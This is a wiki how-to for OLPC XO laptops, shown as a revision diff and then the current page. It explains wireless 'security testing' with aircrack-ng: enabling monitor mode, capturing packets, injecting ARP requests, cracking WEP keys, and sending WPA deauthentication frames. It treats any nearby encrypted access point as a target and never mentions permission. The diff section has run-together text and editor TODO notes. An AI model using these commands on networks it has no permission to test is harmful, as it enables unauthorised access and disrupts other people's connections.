Wireless network hacking: Difference between revisions
No edit summary |
No edit summary |
||
(15 intermediate revisions by 14 users not shown) | |||
Line 4: | Line 4: | ||
These instructions describe how to test wireless networks for security holes and how to use the various security softwares with the XO OLPC. However, great care should be taken in using these tools and software as they may brick your XO in the worst case or considerably bloat your configuration. (Especially when saving large data files...) |
These instructions describe how to test wireless networks for security holes and how to use the various security softwares with the XO OLPC. However, great care should be taken in using these tools and software as they may brick your XO in the worst case or considerably bloat your configuration. (Especially when saving large data files...) |
||
== XO-1.5 == |
|||
For now, enabling monitor mode on newer XOs is not as simple as on the XO-1. For more information, see [[XO-1.5 Wireless Test Setup]] and [[XO-1.5 Wireless Test Report#Verify_monitor_interface]] |
|||
== Updating Your Software/Firmware == |
== Updating Your Software/Firmware == |
||
Line 15: | Line 18: | ||
=== Check Wireless Firmware === |
=== Check Wireless Firmware === |
||
Check that you have a recent version of the wireless firmware by following these instructions: http://wiki.laptop.org/go/Test_Config_Notes#Update_the_wireless_firmware |
Check that you have a recent version of the wireless firmware by following these instructions: http://wiki.laptop.org/go/Test_Config_Notes#Update_the_wireless_firmware |
||
=== Check Software === |
|||
== Install security related software == |
== Install security related software == |
||
Line 37: | Line 38: | ||
== Performing the Analysis == |
== Performing the Analysis == |
||
=== Find a target network === |
=== Find a target network === |
||
Press the Mesh button and inspect any interesting access point (AP). Any AP with a padlock on it is encrypted in one way or another. These are the ones suited for a WEP/WPA crack. |
Press the Mesh button and inspect any interesting access point (AP). Any AP with a padlock on it is encrypted in one way or another. These are the ones suited for a WEP/WPA crack. |
||
Line 42: | Line 44: | ||
=== Collect Network data === |
=== Collect Network data === |
||
Next we need to collect packet data. The way to do this is by enabling [[tcpdump]] or [[wireshark]]. However, because of some non standard wireless chipsets, we need to do the following: |
Next we need to collect packet data. The way to do this is by enabling [[tcpdump]] or [[wireshark]]. However, because of some non standard wireless chipsets, we need to do the following: |
||
/sbin/service NetworkManager stop # This service can interfere with monitoring |
|||
[[Could someone confirm that this is necessary?]] |
|||
echo 0x7 > /sys/class/net/eth0/device/net/eth0/lbs_rtap # Enable monitor mode |
|||
ifconfig msh0 down ifconfig eth0 down killall NetworkManager |
|||
ifconfig rtap0 up # Bring up the monitor interface |
|||
[[perhaps it would be more stylish to stop the service instead??:]] |
|||
The location of your sys file may be different. You can find it with: <code>find /sys/class -name '*rtap*'</code> |
|||
⚫ | |||
monitor mode on the Marvell chipset: |
|||
Start dumping the data: |
|||
export TRAFFIC_MASK=0x7 echo $TRAFFIC_MASK > /sys/class/net/eth0/device/libertas_rtap ifconfig rtap0 up |
|||
* note: it seems that on joyride 1772 the file is /sys/class/net/eth0/lbs_rtap* and changing the TRAFFIC_MASK to 0x0 sets it back to normal mode from monitor mode. Start dumping the data: |
|||
[[There is another version of this in the wireshark manual with "s 1500" instead...]] |
|||
tcpdump -s 128 -i rtap0 -w datadump.cap* |
tcpdump -s 128 -i rtap0 -w datadump.cap* |
||
Or use airodump, part of the aircrack-ng package in the olpc repository |
|||
airodump-ng --write [dumpfile] rtap0 |
airodump-ng --write [dumpfile] rtap0 |
||
Then we need to restore everything for normal operation |
Then we need to restore everything for normal operation: |
||
ifconfig rtap0 down /sbin/service NetworkManager start ifconfig msh0 up ifconfig eth0 up* remember to echo 0x0 to your /sys/class/net/eth0/lbs_rtap file to disable monitor modeHowever this is not at all obvious to what all this means, and in addition it is a great risk that you crash your XO. So rather use [[this]] script, like this:[[still to do]] su wget http://..../capture.sh chmod +x capture.sh ./capture.sh=== Generate extra packets ===By using aireplay-ng, we can generate extra packets in a short time, by injecting bogous ARP requests.In this examples we will use: 00:11:22:33:44:55 AP 00:66:77:88:99:AA clientThe command is something like: aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:66:77:88:99:AA eth0=== Cracking a WEP key === Follow the instructions at this page: http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_NetworksTODO: [[We should write a short distillation of that wiki here.]]==== Using aircrack-ng: ==== aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:66:77:88:99:AA eth0Start another console session and enter: aircrack-ng -z -b 00:11:22:33:44:55 output*.cap [[using the PTW WEP-cracking method]] aircrack-ng -b 00:11:22:33:44:55 output*.cap [[using the FMS/Korek method]]Using the FMS/Korek method you will need approximately 250,000 IVs for 64 bit and 1,500,000 IVs for 128bit keys. Using the PTW method, 40-bit WEP can be cracked with as few as 20,000 data packets and 104-bit WEP with 40,000 data packets.=== Cracking a WPA key === Execute the following command in the terminal application while there is a client succesfully connected to the wireless access point: aireplay -0 5 -a <AP MAC> -c <Client MAC> ath0=== Cracking a MESH network === [[to do]] |
|||
ifconfig rtap0 down |
|||
echo 0x0 > /sys/class/net/eth0/device/net/eth0/lbs_rtap |
|||
⚫ | |||
=== Generate extra packets === |
|||
By using aireplay-ng, we can generate extra packets in a short time, by injecting bogus ARP requests.In this examples we will use: 00:11:22:33:44:55 AP 00:66:77:88:99:AA client. The command is something like: |
|||
aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:66:77:88:99:AA eth0 |
|||
=== Cracking a WEP key === |
|||
Follow the instructions at this page: http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks |
|||
TODO: [[We should write a short distillation of that wiki here.]] |
|||
==== Using aircrack-ng: ==== |
|||
aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:66:77:88:99:AA eth0 |
|||
Start another console session and enter: |
|||
aircrack-ng -z -b 00:11:22:33:44:55 output*.cap |
|||
[[using the PTW WEP-cracking method]] |
|||
aircrack-ng -b 00:11:22:33:44:55 output*.cap |
|||
[[using the FMS/Korek method]]Using the FMS/Korek method you will need approximately 250,000 IVs for 64 bit and 1,500,000 IVs for 128bit keys. Using the PTW method, 40-bit WEP can be cracked with as few as 20,000 data packets and 104-bit WEP with 40,000 data packets. |
|||
=== Cracking a WPA key === |
|||
Execute the following command in the terminal application while there is a client successfully connected to the wireless access point: |
|||
aireplay -0 5 -a <AP MAC> -c <Client MAC> ath0 |
|||
oxygen-00173 |
|||
=== Cracking a MESH network === |
|||
[[to do]] |
|||
== Airtime analysis == |
== Airtime analysis == |
||
Line 66: | Line 97: | ||
http://wiki.laptop.org/go/88W8388 |
http://wiki.laptop.org/go/88W8388 |
||
http://wiki.laptop.org/go/Wireless#Capturing_wireless_traffic_on_the_xo |
http://wiki.laptop.org/go/Wireless#Capturing_wireless_traffic_on_the_xo |
||
{{Trac|4805}} |
|||
http://dev.laptop.org/ticket/4805 |
|||
http://lists.infradead.org/pipermail/libertas-dev/2007-July/000607.html |
http://lists.infradead.org/pipermail/libertas-dev/2007-July/000607.html |
||
http://lists.infradead.org/pipermail/libertas-dev/2007-December/001003.html |
http://lists.infradead.org/pipermail/libertas-dev/2007-December/001003.html |
||
Line 76: | Line 107: | ||
http://www.wireshark.org/ |
http://www.wireshark.org/ |
||
http://www.kismetwireless.net/ |
http://www.kismetwireless.net/ |
||
http://www. |
http://www.aircrack-ng.org/doku.php |
||
http://www.nessus.org/nessus/ |
http://www.nessus.org/nessus/ |
||
http://www.tcpdump.org/tcpdump_man.html |
http://www.tcpdump.org/tcpdump_man.html |
||
http://www. |
http://www.freebsd.org/cgi/man.cgi?query=traceroute |
||
To check what's |
To check what's in the default installation: |
||
http://dev.laptop.org/~bert/joyride-pkgs.html |
http://dev.laptop.org/~bert/joyride-pkgs.html |
||
[[Category:Network]] |
|||
[[Category:Security|Wireless network hacking]] |
[[Category:Security|Wireless network hacking]] |
Latest revision as of 14:27, 3 November 2011
Please copy/paste "{{Translationlist | xx | origlang=en | translated={{{translated}}}}}" (where xx is ISO 639 language code for your translation) to Wireless network hacking/translations | HowTo [ID# 262362] +/- |
These instructions describe how to test wireless networks for security holes and how to use the various security softwares with the XO OLPC. However, great care should be taken in using these tools and software as they may brick your XO in the worst case or considerably bloat your configuration. (Especially when saving large data files...)
XO-1.5
For now, enabling monitor mode on newer XOs is not as simple as on the XO-1. For more information, see XO-1.5 Wireless Test Setup and XO-1.5 Wireless Test Report#Verify_monitor_interface
Updating Your Software/Firmware
Check General Firmware
http://wiki.laptop.org/go/Firmware http://wiki.laptop.org/go/Upgrading_the_firmware
Check Wireless Firmware
Check that you have a recent version of the wireless firmware by following these instructions: http://wiki.laptop.org/go/Test_Config_Notes#Update_the_wireless_firmware
In order to continue we need some network tools:
- wireshark - Is the world's foremost network protocol analyzer (formerly known as Ethereal)
- kismet - Is a 802.11 layer2 wireless network detector, sniffer, and intrusion detection system.
- aircrack-ng - Is a 802.11 WEP/WPA-PSK key cracking program that can recover keys from enough captured data packets
- nessus - Is a well known network vulnerability scanner
- bind-utils - Is a collection of utilities for querying name servers and looking up hosts.
- traceroute - is a computer network tool used to determine the route taken by packets across an IP network.
We can install all of these in one go (in the terminal application):
su yum install wireshark wireshark-gnome kismet aircrack-ng nessus bind-utils traceroute
Configuration of Network Tools
Performing the Analysis
Find a target network
Press the Mesh button and inspect any interesting access point (AP). Any AP with a padlock on it is encrypted in one way or another. These are the ones suited for a WEP/WPA crack.
Collect Network data
Next we need to collect packet data. The way to do this is by enabling tcpdump or wireshark. However, because of some non standard wireless chipsets, we need to do the following:
/sbin/service NetworkManager stop # This service can interfere with monitoring echo 0x7 > /sys/class/net/eth0/device/net/eth0/lbs_rtap # Enable monitor mode ifconfig rtap0 up # Bring up the monitor interface
The location of your sys file may be different. You can find it with: find /sys/class -name '*rtap*'
Start dumping the data:
tcpdump -s 128 -i rtap0 -w datadump.cap*
Or use airodump, part of the aircrack-ng package in the olpc repository
airodump-ng --write [dumpfile] rtap0
Then we need to restore everything for normal operation:
ifconfig rtap0 down echo 0x0 > /sys/class/net/eth0/device/net/eth0/lbs_rtap /sbin/service NetworkManager start
Generate extra packets
By using aireplay-ng, we can generate extra packets in a short time, by injecting bogus ARP requests.In this examples we will use: 00:11:22:33:44:55 AP 00:66:77:88:99:AA client. The command is something like:
aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:66:77:88:99:AA eth0
Cracking a WEP key
Follow the instructions at this page: http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks TODO: We should write a short distillation of that wiki here.
Using aircrack-ng:
aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:66:77:88:99:AA eth0
Start another console session and enter:
aircrack-ng -z -b 00:11:22:33:44:55 output*.cap
using the PTW WEP-cracking method
aircrack-ng -b 00:11:22:33:44:55 output*.cap
using the FMS/Korek methodUsing the FMS/Korek method you will need approximately 250,000 IVs for 64 bit and 1,500,000 IVs for 128bit keys. Using the PTW method, 40-bit WEP can be cracked with as few as 20,000 data packets and 104-bit WEP with 40,000 data packets.
Cracking a WPA key
Execute the following command in the terminal application while there is a client successfully connected to the wireless access point:
aireplay -0 5 -a <AP MAC> -c <Client MAC> ath0
oxygen-00173
Cracking a MESH network
Airtime analysis
For checking how much of the medium a give type of traffic is consuming, check this page
For More Info
http://wiki.laptop.org/go/Wireless_Driver_README http://wiki.laptop.org/go/88W8388 http://wiki.laptop.org/go/Wireless#Capturing_wireless_traffic_on_the_xo (Trac #4805) http://lists.infradead.org/pipermail/libertas-dev/2007-July/000607.html http://lists.infradead.org/pipermail/libertas-dev/2007-December/001003.html http://www.hpl.hp.com/personal/Jean_Tourrilhes/Linux/Linux.Wireless.drivers.802.11ag.html http://www.olpcnews.com/forum/index.php?topic=814.msg13043;topicseen
References:
http://www.wireshark.org/ http://www.kismetwireless.net/ http://www.aircrack-ng.org/doku.php http://www.nessus.org/nessus/ http://www.tcpdump.org/tcpdump_man.html http://www.freebsd.org/cgi/man.cgi?query=traceroute To check what's in the default installation: http://dev.laptop.org/~bert/joyride-pkgs.html